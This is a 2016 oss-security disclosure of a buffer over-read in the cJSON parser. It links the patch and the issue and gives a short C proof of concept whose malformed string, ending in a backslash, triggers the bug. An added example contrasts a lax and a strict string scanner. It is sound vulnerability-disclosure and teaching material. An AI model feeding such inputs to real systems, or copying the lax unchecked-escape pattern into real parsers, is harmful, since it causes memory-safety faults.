Date: Sun, 2 Oct 2016 20:06:25 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: cJSON buffer out of bound read

Hi,

I would like to report a buffer out of bound read problem in cJSON, which
is an embeddable JSON parser, used (I imagine) in embedded devices, or even
bigger stuff like the PS4 (
http://doc.dl.playstation.net/doc/ps4-oss/cjson.html).

patch:
https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917

issue:
https://github.com/DaveGamble/cJSON/issues/30

PoC with the malformed string:

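#include <stdio.h>
#include <stdlib.h>
#include "cJSON.h"

/* Malformed JSON: a string whose last byte before the NUL is a backslash. */
static const char *my_json = "\"000000000000000000\\";

int main(int argc, const char * argv[]) {
    (void)argc; (void)argv;
    cJSON * root = cJSON_Parse(my_json);
    if (root == NULL) {
        /* NULL means the parser rejected the input. */
        fprintf(stderr, "parse failed\n");
        return 1;
    }
    char * rendered = cJSON_Print(root);
    if (rendered != NULL) {
        printf("%s\n", rendered);
        free(rendered);
    }
    cJSON_Delete(root);
    return 0;
}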

thanks

Marco
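
Added example, not part of the original post and not cJSON's own code: a simplified model, assumed here, of a string scanner that skips the byte after each backslash, next to a version that checks for the terminator first. The names scan_lax and scan_strict and the guard bytes appended after the PoC string are constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed input: the PoC string, its NUL, then guard bytes standing in
 * for whatever follows the buffer in memory. Keeping them in one array makes
 * the overrun observable without undefined behaviour. */
static const char GUARDED[] = "\"000000000000000000\\\0GUARD\"";
static const char WELL_FORMED[] = "\"a\\\"b\"";   /* the JSON text "a\"b" */

/* Lax scan: skips the byte after every backslash without checking whether
 * that byte is the terminator. Returns the offset where scanning stopped. */
static size_t scan_lax(const char *s)
{
    const char *p = s + 1;                 /* skip the opening quote */
    while (*p != '\"' && *p != '\0') {
        if (*p++ == '\\')
            p++;                           /* can step over the '\0' */
    }
    return (size_t)(p - s);
}

/* Strict scan: returns 0 and sets *end to the offset of the closing quote,
 * or -1 if the input ends before the string is closed. */
static int scan_strict(const char *s, size_t *end)
{
    const char *p = s;
    if (*p++ != '\"')
        return -1;
    while (*p != '\"') {
        if (*p == '\0')
            return -1;                     /* unterminated string */
        if (*p == '\\' && *++p == '\0')
            return -1;                     /* backslash was the last byte */
        p++;
    }
    *end = (size_t)(p - s);
    return 0;
}

int main(void)
{
    size_t end = 0, poc_end = 0;
    int ok = scan_strict(WELL_FORMED, &end);
    printf("terminator at %zu, lax scan stopped at %zu\n",
           strlen(GUARDED), scan_lax(GUARDED));
    printf("strict: PoC=%d well-formed=%d (closing quote at %zu)\n",
           scan_strict(GUARDED, &poc_end), ok, end);
    return 0;
}
```

The lax scan stops beyond the offset reported by strlen, which is the out-of-bounds condition; the strict scan rejects the same input and still accepts a string containing an escaped quote.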
